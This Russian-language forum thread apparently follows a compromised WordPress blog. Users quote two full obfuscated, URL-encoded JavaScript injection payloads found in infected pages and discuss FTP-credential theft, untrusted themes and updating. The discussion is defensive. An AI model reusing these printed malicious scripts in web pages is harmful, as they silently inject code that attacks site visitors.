|
На страницу Пред. 1, 2, 3 След. |
|
|
|
vitvirtual, обычное дело  В нашем бизе терпение - немаловажная вещь |
|
|
|
|
|
блин, что-то касперский у тебя на сайте трояна детектит  |
|
|
|
|
|
| мог бы поставить плюс, поставил бы, статья что надо, как раз искал что то подобное |
|
|
|
|
|
| americanotropicano писал(а): |
|
блин, что-то касперский у тебя на сайте трояна детектит
|
Трояна точно нет, глюки есть, а трояна нет, счас переколбасил весь код... А глюки из-за того, что времени совсем нет счас своим блогом заниматься |
|
|
|
|
|
| Technotronic писал(а): |
|
мог бы поставить плюс, поставил бы, статья что надо, как раз искал что то подобное
|
Что же помешало? То что я написал, что не могу этим сам заниматься? Во-первых это инвестиций требует, я не особо богат сейчас, поэтому не могу позволить блогораму купить и домены тоже не могу в больших количествах покупать. Во-вторых - я устроился на работу, и просто нет времени даже своим блогом заняться, не то что какие-то бизнесы организовывать... |
|
|
|
|
|
Советую тебе еще раз пересмотреть код шаблона на предмет
| Код: |
<!--[z0s]--><script>document.write(unescape("%3Cscript%3Eif%28jn%21%3D1%29%7Bfunction%20IN%28Zm%29%7Breturn%20Zm%7Dtry%7Bvar%20Fd%3D%27YYuYFuY
euYIuYwuY6uYDuYnuYtuYWuYbuYiuYouYhuYLuYguYluY4uY8uYRuYVuYxuYJuY7uY5uY3uYNuYTuYAuYfuYauYUuYOuYruYjuYPuY9uYduYGuYmuYyuYHuYBuYSuYKuYXuYkuYcuYCuYMuYzuYpuYquYZuFYuFFuFeuFIuFwuF6uFD
uFnuFtuFWuFbuFiuFouFhuFLuFguFluF4uF8uFRuFVuFxuFJuF7uF5uF3uFNuFTuFA%27%3Bvar%20qv%3DFd.substr%282%2C1%29%2CYx%3DArray%2824824%5E24599%2Cnh%28%27160%27%29%2C26695%5E26871%2C5172
%5E5269%2C26933%5E27023%2C28832%5E28675%2Cnh%28%27167%27%29%2Cnh%28%27237%27%29%2Cnh%28%27181%27%29%2C27969%5E28135%2Cnh%28%27189%27%29%2Cnh%28%27188%27%29%2Cnh%28%27243%27%29
%2Cnh%28%27139%27%29%2Cnh%28%27152%27%29%2C14766%5E14677%2C32539%5E32641%2Cnh%28%27135%27%29%2Cnh%28%27162%27%29%2Cnh%28%27255%27%29%2Cnh%28%27177%27%29%2Cnh%28%27250%27%29%2C
29873%5E29721%2Cnh%28%27165%27%29%2C16467%5E16609%2C30536%5E30667%2C25232%5E25105%2Cnh%28%27171%27%29%2C17517%5E17539%2C10681%5E10511%2Cnh%28%27164%27%29%2C28132%5E28019%2Cnh%
28%27191%27%29%2Cnh%28%27138%27%29%2Cnh%28%27146%27%29%2C28577%5E28489%2C2820%5E3065%2Cnh%28%27190%27%29%2C967%5E883%2Cnh%28%27248%27%29%2C24802%5E24585%2Cnh%28%27229%27%29%2C
25708%5E25739%2Cnh%28%27227%27%29%2C4636%5E4779%2Cnh%28%27184%27%29%2C8694%5E8455%2Cnh%28%27148%27%29%2Cnh%28%27158%27%29%2Cnh%28%27128%27%29%2C9489%5E9663%2C17623%5E17491%2Cn
h%28%27244%27%29%2Cnh%28%27226%27%29%2Cnh%28%27185%27%29%2C4328%5E4221%2Cnh%28%27153%27%29%2C4309%5E4183%2Cnh%28%27252%27%29%2C29324%5E29239%2C4879%5E5011%2C5123%5E5373%2Cnh%2
8%27150%27%29%2C12224%5E12073%2Cnh%28%27242%27%29%2C14213%5E14185%2Cnh%28%27136%27%29%2C29984%5E30125%2C7616%5E7529%2C27967%5E28117%2Cnh%28%27142%27%29%2Cnh%28%27143%27%29%2Cn
h%28%27225%27%29%2C22208%5E22097%2Cnh%28%27170%27%29%2C6467%5E6611%2C11902%5E11943%2Cnh%28%27224%27%29%2C32329%5E32431%2C16645%5E16865%2Cnh%28%27134%27%29%2Cnh%28%27155%27%29%
2Cnh%28%27249%27%29%29%3Bvar%20VY%2CGx%3Bvar%20rn%2CKR%3D%27YYYFYeYIYwY6YDYnYtYWYbYeYDYwYiYbYoYhYLYtYgYlY4Y8YRYeYiYVYxYJYoY7Y5YIYoY3YNYTYAYbYfYaYoYUY5YDYfYgYxYRYoYOYrYjYAYoYbY
fYaYoYUY5YDYfYgYxYPYoYOYrYjY9YFYfYDY4YwYdYfYgY3YNYTY9YGYfYDY4YwYdYfYgYxYmYyYHYBYSYSYSYSYSYxYPYoYKYiYeYWYdYfYbYDY9YeYiYiYXYwYfYoYAYoYlY4Y8YmYkYAYkYmYfYFYeY5Y6YfYgYeYiYVYxYmYkYP
YfYTY6YwYIYfYFYAYkYmYOYrYjY9YDYiYcYCY4YMYDYIYwYbYGYgYxYPYoYzY7Y5YIYoYiYpYNYAYqYFYZYtFYYVY4YqYPY7Y5YIYoY5YdYcYAYqYZYqYRFFYKFeYAYqYWY6YKY5YDYfYZY9YeYOY5YFYFYwYeYDYfYOY9YiYIYGYqY
PY7Y5YIYoYLFIYaYAYqFwF6YDYdYOFwYqYPYwYtYgYKYiYeYWYdYfYbYDY9YeYiYiYXYwYfY9YwYbYKYfYTFDYtYgYiYpYNYmYqYAYqYmY5YdYcYxYoYAYAFnYZYxYJY7Y5YIYoYKYOF6YAYKYiYeYWYdYfYbYDY9YOYiYeY5YDYwYi
YbY9F6YiYFYDYPY7Y5YIYoFtYjFeYAYoYqF6YDYqYmYqYDY6FWYqYmYqFwFwYqYmYgYoYKYOF6YoFbYAYoYqYqFiYqYqFWFtYbYpYgYxYxYoYmYoYKYOF6Y9YIYfY6YOY5YeYfYoYgFwFoFhY5FnFLYSFnFgY9FnFlFwYRYqY9YqYxY
9YIYfY6YOY5YeYfYoYgFwF4Y9YmFwYRYqY9YqYxYmYqY9YqYmFtYbYpYgYxYoYmYqY9YqYoYmYoFFYKFeYmYLFIYaYPY7Y5YIYoYCYXY3YAYKYiYeYWYdYfYbYDY9YeYIYfY5YDYfFtYOYfYdYfYbYDYgYqYwYtYIY5YdYfYqYxYPYC
YXY3Y9YFYfYDYjYDYDYIYwYVYWYDYfYoYgYqYFYIYeYqYRYoFtYjFeYxYPYCYXY3Y9F6YfYwYGF6YDYAYBYPYCYXY3Y9YaYwYKYDF6YAF8YPYCYXY3Y9YtYIY5YdYfFRYiYIYKYfYIYoYAYoYSYPYoYDYIFVYJYoYKYiYeYWYdYfYbY
DY9YVYiYKFVY9Y5Y6Y6YfYbYKFxF6YwYOYKYoYgYoYCYXY3YxYPYoYhYLYtYgYiYpYNYRYoY5YdYcYoYxYPYzYoYeY5YDYeF6YgYfYxYoYJYKYiYeYWYdYfYbYDY9YaYIYwYDYfYoYgYqYYF6YDYdYOYnYYYVYiYKFVYnYYFwYVYiYK
FVYnYYFwF6YDYdYOYnYqYxYPYoYKYiYeYWYdYfYbYDY9YVYiYKFVY9Y5Y6Y6YfYbYKFxF6YwYOYKYoYgYoYCYXY3YxYPYhYLYtYoYgYoYiYpYNYRY5YdYcYxYoYPYzYoYzFJYtYWYbYeYDYwYiYbYoFtYbYpYgYxYJYoY7Y5YIYoYpF
xYaYAF8YBYPY7Y5YIYoFYFIYdYAYkYSYZF8F7YBF5YHF3YyFgYSY5YVYeYKYfYtYkYRFFYDYlYAYkYkYPYoYtYiYIYgYTFNFTYAYSYPYoYTFNFTYoYYYoYpFxYaYPYoYTFNFTYmYmYxYoFFYDYlYmYAYoFYFIYdY9YFYWYVYFYDYIYg
YCY5YDF6Y9YtYOYiYiYIYgYCY5YDF6Y9YIY5YbYKYiYdYgYxFAFYFIYdY9YOYfYbYGYDF6YxYRYZYRYZYxYPYoYIYfYDYWYIYbYoFFYDYlYPYoYzYYFwYFYeYIYwY6YDYn%27%3Bvar%20fO%3DString%28%29%3BFd%3DFd.split
%28qv%29%3Bfor%20%28VY%3D0%3BVY%3CKR.length%3BVY+%3D2%29%7Brn%3DKR.substr%28VY%2C2%29%3Bfor%28Gx%3D0%3BGx%3CFd.length%3BGx++%29%7Bif%28Fd%5BGx%5D%3D%3Drn%29break%3B%7DfO+%3DSt
ring.fromCharCode%28Yx%5BGx%5D%5E211%29%3B%7Dfunction%20nh%28bp%29%7Breturn%20parseInt%28bp%29%7Ddocument.write%28fO%29%3B%7Dcatch%28Ngl%29%7B%7D%7Dvar%20jn%3D1%3C/script%3E&q
uot;))</script><!--[/z0s]-->
|
Явно кто то поковырялся и воткнул какую то гадость. |
|
|
|
|
|
А как это делают? Я вот буквально неделю назад нашёл на одном своём заброшенном сайтике (бесплатный хостинг):
| Код: |
<!--[O]--><script>document.write(unescape("%3Cscript%3Etry%20%7Bfunction%20PTy%28IAD%29%7Breturn%20parseInt%28IAD%29%7Dvar%20laJ%3D%27JJuJLuJn
uJIuJhuJWuJHuJ3uJTuJZuJwuJKuJiuJzuJcuJtuJDuJUuJAuJ8uJCuJbuJOuJpuJMuJouJjuJauJBuJ9uJRuJruJGuJguJNuJluJXuJ4uJyuJmuJxuJduJeuJ5uJquJYuJ6uJ7uJsuJSuJkuJfuJPuJFuLJuLLuLnuLIuLhuLWuLHu
L3uLTuLZuLwuLKuLiuLzuLcuLtuLDuLUuLAuL8uLCuLbuLOuLpuLMuLouLj%27%2CQxa%3DString%28%27u%27%29%3Bvar%20NZv%3DArray%28PTy%28%27152%27%29%2C2412%5E2491%2C6500%5E6563%2CPTy%28%27214%
27%29%2C21908%5E21849%2CPTy%28%27212%27%29%2CPTy%28%27208%27%29%2CPTy%28%27154%27%29%2CPTy%28%27194%27%29%2C11532%5E11741%2CPTy%28%27202%27%29%2CPTy%28%27203%27%29%2CPTy%28%27
132%27%29%2CPTy%28%27206%27%29%2CPTy%28%27230%27%29%2C1149%5E1265%2CPTy%28%27192%27%29%2C6041%5E6009%2C32231%5E32111%2C16356%5E16143%2CPTy%28%27225%27%29%2CPTy%28%27141%27%29%
2C28998%5E29081%2C15787%5E15737%2C31202%5E31015%2C31245%5E31441%2C20266%5E20403%2CPTy%28%27193%27%29%2CPTy%28%27211%27%29%2C312%5E423%2CPTy%28%27213%27%29%2C18401%5E18283%2CPT
y%28%27240%27%29%2C32288%5E32489%2C11758%5E11565%2C9148%5E9011%2CPTy%28%27156%27%29%2CPTy%28%27146%27%29%2CPTy%28%27144%27%29%2C31211%5E31103%2C14518%5E14457%2CPTy%28%27134%27
%29%2CPTy%28%27227%27%29%2CPTy%28%27233%27%29%2CPTy%28%27247%27%29%2C13860%5E14077%2C17934%5E18171%2C11104%5E11235%2C26082%5E25975%2CPTy%28%27231%27%29%2C32040%5E32217%2C15355
%5E15111%2C12789%5E12605%2CPTy%28%27239%27%29%2C30223%5E30457%2CPTy%28%27139%27%29%2C19735%5E19931%2CPTy%28%27137%27%29%2C30493%5E30709%2C3659%5E3797%2CPTy%28%27133%27%29%2C29
116%5E28967%2CPTy%28%27254%27%29%2CPTy%28%27243%27%29%2CPTy%28%27255%27%29%2C23673%5E23683%2CPTy%28%27222%27%29%2CPTy%28%27157%27%29%2C7894%5E7727%2C26319%5E26167%2C27003%5E27
033%2C22409%5E22375%2C28924%5E28697%2CPTy%28%27198%27%29%2C22708%5E22563%2C14184%5E14261%2C27719%5E27881%2CPTy%28%27150%27%29%2CPTy%28%27145%27%29%2C16368%5E16227%2CPTy%28%271
42%27%29%29%2CNaZ%3Bvar%20uWR%2CuxH%3Bvar%20Oom%3D%27JJJLJnJIJhJWJHJ3JTJZJwJnJHJhJKJwJiJzJcJtJDJUJAJ8JCJbJOJiJpJMJIJiJoJUJjJwJaJBJiJUJMJHJaJtJbJ9JpJMJIJiJiJRJWJjJiJwJaJBJiJUJM
JHJaJtJbJ9JiJRJWJrJLJaJHJGJhJgJaJtJoJUJrJNJaJHJGJhJgJaJtJbJlJXJ4JyJmJmJmJmJmJbJ9JiJDJKJnJZJgJaJwJHJrJnJKJKJxJhJaJiJjJiJDJUJlJdJjJdJlJaJLJnJMJWJaJtJ8JCJbJlJdJ9JaJoJWJhJIJaJLJjJ
dJlJRJWJrJHJKJeJ5JGJqJHJIJhJwJNJtJbJ9JiJYJpJMJIJiJ6JDJjJ7JLJsJTJSJhJ7JAJkJnJjJ7JsJ7J9JpJMJIJiJ5JfJjJ7JZJWJDJMJHJaJsJrJnJPJMJLJLJhJnJHJaJPJrJKJIJNJ7JAJFLJJjJ7LLLnJHJgJPLLJ7J9Jh
JTJtJDJKJnJZJgJaJwJHJrJnJKJKJxJhJaJrJhJwJDJaJoJ8JTJtJ6JDJlJ7JjJ7JlJkJnJbJjJjLIJsJbJOJiJpJMJIJiLhJFJjJ7LnJHJHJWLWLLLLJ7JlJtJDJKJnJZJgJaJwJHJrJPJKJnJMJHJhJKJwJrLnJKJLJHJiLHJjJiJ
7J7L3J7J7LWLTLZJtJbJbJlJDJKJnJZJgJaJwJHJrJPJKJnJMJHJhJKJwJrLnJKJLJHJrJIJaJWJPJMJnJaJtLLLwLKJMLILiJmLILzJrLILcLLJAJ7JrJ7JbJrJIJaJWJPJMJnJaJtLLLtJrJlLLJAJ7JrJ7JbJlJ7JrJ7JlLTLZJt
JbJlJ7JrJ7JlJ5JfJlJFLJJ9JpJMJIJiLDLUJjJDJKJnJZJgJaJwJHJrJnJIJaJMJHJaJCJPJaJgJaJwJHJtJ7JhJTJIJMJgJaJ7JbJ9LDLUJrJLJaJHLAJHJHJIJhL8JZJHJaJtJ7JLJIJnJ7JALhJFJbJ9LDLUJrJTJIJMJgJaJcJ
KJIJDJaJIJjJmJ9JiLDLUJrJBJhJDJHLnJjJmJ9LDLUJrLnJaJhJNLnJHJjLCJ9JHJILbJiJOJiJDJKJnJZJgJaJwJHJrL8JKJDLbJrJMJWJWJaJwJDJSLnJhJPJDJtLDLUJbJ9JzJcJtJ6JDJAJkJnJbJ9JiJYJnJMJHJnLnJtJaJb
JOJiJDJKJnJZJgJaJwJHJrJBJIJhJHJaJtJ7JJLnJHJgJPJ3JJL8JKJDLbJ3JJLLL8JKJDLbJ3JJLLLnJHJgJPJ3J7JbJ9JDJKJnJZJgJaJwJHJrL8JKJDLbJrJMJWJWJaJwJDJSLnJhJPJDJtLDLUJbJ9JiJzJcJtJ6JDJAJkJnJbJ
9JiJYJiJYLOJTJZJwJnJHJhJKJwJiLTLZJtJbJOJiJpJMJIJiJWJIJjLpJyJAJpJHJjJdJmJsLpLCJyLMJ4LoJXLzJmJML8JnJDJaJTJdJ9JpJMJIJiJhJnJjJdJdJ9JiJTJKJIJtJpLiJjJmJ9JiJpLiJiJJJiJWJIJ9JiJpLiJlJl
JbJiJhJnJlJjJiJpJHJrJLJZL8JLJHJIJtJ5JMJHLnJrJTJPJKJKJIJtJ5JMJHLnJrJIJMJwJDJKJgJtJbLjJpJHJrJPJaJwJNJHLnJbJAJsJAJsJbJ9JiJIJaJHJZJIJwJiJhJnJ9JiJYJJLLJLJnJIJhJWJHJ3%27%2CRwH%3D%27
%27%3BlaJ%3DlaJ.split%28Qxa%29%3Bfor%28NaZ%3D0%3BNaZ%3COom.length%3BNaZ+%3D2%29%7BuxH%3DOom.substr%28NaZ%2C2%29%3Bfor%28uWR%3D0%3BuWR%3ClaJ.length%3BuWR++%29%7Bif%28laJ%5BuWR%
5D%3D%3DuxH%29break%3B%7D%20RwH+%3DString.fromCharCode%28NZv%5BuWR%5D%5E164%29%3B%7Ddocument.write%28RwH%29%3B%7D%0Acatch%28e%29%7B%7D%3C/script%3E"))</script&
gt;<!--[/O]-->
|
Говорят, что обычно какой-то троян подбрасывают, чтобы он ходил по всем FTP в Total Commander, и этот сайтик у меня действительно был в тотале... Но дело в том, что все остальные аккаунты не тронуты. Ничего не понимаю. |
|
|
|
|
|
Ну начну с того, что собирая себе шаблоны WP или плагины к нему, стоит собирать их из надежных источников (лучше всего только с официальных). Ибо "чужие" коллекции шаблонов или плагинов очень часто оказываются, мягко говоря, с душком говнеца, если не полениться и просмотреть их сорцы Причем говнецо иногда ооочень хорошо спрятано. Так, что даже высококлассный кодер не сразу найдет где же запрятан бэкдорчик.
Справедливости ради замечу, что это касается не только WP, но и почти всех OpenSource CMS (блогов, форумов, пузомерок и прочего). |
|
|
|
|
|
| А у меня тот сайт из статичного HTMLа на бесплатном местном хостинге. То есть явно вскрыли либо хостинг, либо меня. Мне бы узнать точно, кого именно, а то неприятно как-то ) |
|
|
|
|
|
| Второй бесплатный совет: всегда расчитывай на худший вариант Т.е. в данном случае ищи косяки у себя в любом случае. |
|
|
|
|
|
| Вацлав писал(а): |
Ну начну с того, что собирая себе шаблоны WP или плагины к нему, стоит собирать их из надежных источников (лучше всего только с официальных). Ибо "чужие" коллекции шаблонов или плагинов очень часто оказываются, мягко говоря, с душком говнеца, если не полениться и просмотреть их сорцы Причем говнецо иногда ооочень хорошо спрятано. Так, что даже высококлассный кодер не сразу найдет где же запрятан бэкдорчик.
Справедливости ради замечу, что это касается не только WP, но и почти всех OpenSource CMS (блогов, форумов, пузомерок и прочего).
|
По ходу это вот эта штука:
<Script Language="JavaScript">
function jumpTo(URL_List){
var URL = URL_List.options[URL_List.selectedIndex].value;
window.location.href = URL;
}
</script>
а может и не она, придется перебирать всю тему, а то и wp переустанавливать, в следующий раз надо закрывать файлы темы для редактирования, у меня 666 были права
нет, не она точно, стираю блог нафиг счас, на днях переустановлю все более качественно...
Это мне в отместку наверное засадили, чтобы крутяшком себя не показывал |
|
|
|
|
|
Нет, это не она. Посмотри или index.php или footer.php если он у тебя есть в теме. Там в самом конце должна быть эта вставка. Причем так хитро сделано, что в любом редакторе она у тебя будет вылазить за экран и ты ее можешь не заметить.
Есть подозрение что такие вещи сейчас делаются уже на автомате - то есть находится дыра в скрипте, автоматом получается доступ к фтп, и автоматом же загоняется код эксплойта. Так же встречался код с обычной линкой, и фрейм. Щас уже похоже и шифровать все это дело начали.
Так что господа, обновляйтесь почаще. В новых релизах обычно исправляют большинство дыр в секьюрити. |
|
|
|
|
|
| docker писал(а): |
Нет, это не она. Посмотри или index.php или footer.php если он у тебя есть в теме. Там в самом конце должна быть эта вставка. Причем так хитро сделано, что в любом редакторе она у тебя будет вылазить за экран и ты ее можешь не заметить.
Есть подозрение что такие вещи сейчас делаются уже на автомате - то есть находится дыра в скрипте, автоматом получается доступ к фтп, и автоматом же загоняется код эксплойта. Так же встречался код с обычной линкой, и фрейм. Щас уже похоже и шифровать все это дело начали.
Так что господа, обновляйтесь почаще. В новых релизах обычно исправляют большинство дыр в секьюрити.
|
да нет это не в теме, это в сам движок вордпресса впилили что-то , как ты и говориш, автоматически скорее всего, буду переустанавливать по полной программе, только счас времени нет, поэтому посьба не заходить пока на мой сайт! |
|
|
|
|
|
Угу, у меня тоже написали что на троян на блоге твоем антивирус ругается.
Так что лечи, а пока для народа напишу
Пока что лучше не заходите на блог http://www.vitvirtual.com/ - там троян.
Вылечишь - уберу. А то позаражаются. |
|
|
|
|
|
| Chin писал(а): |
Угу, у меня тоже написали что на троян на блоге твоем антивирус ругается.
Так что лечи, а пока для народа напишу
Пока что лучше не заходите на блог http://www.vitvirtual.com/ - там троян.
Вылечишь - уберу. А то позаражаются.
|
Вылечил трояна, можете убирать это... |
|
|
|
|
|
|
|
|
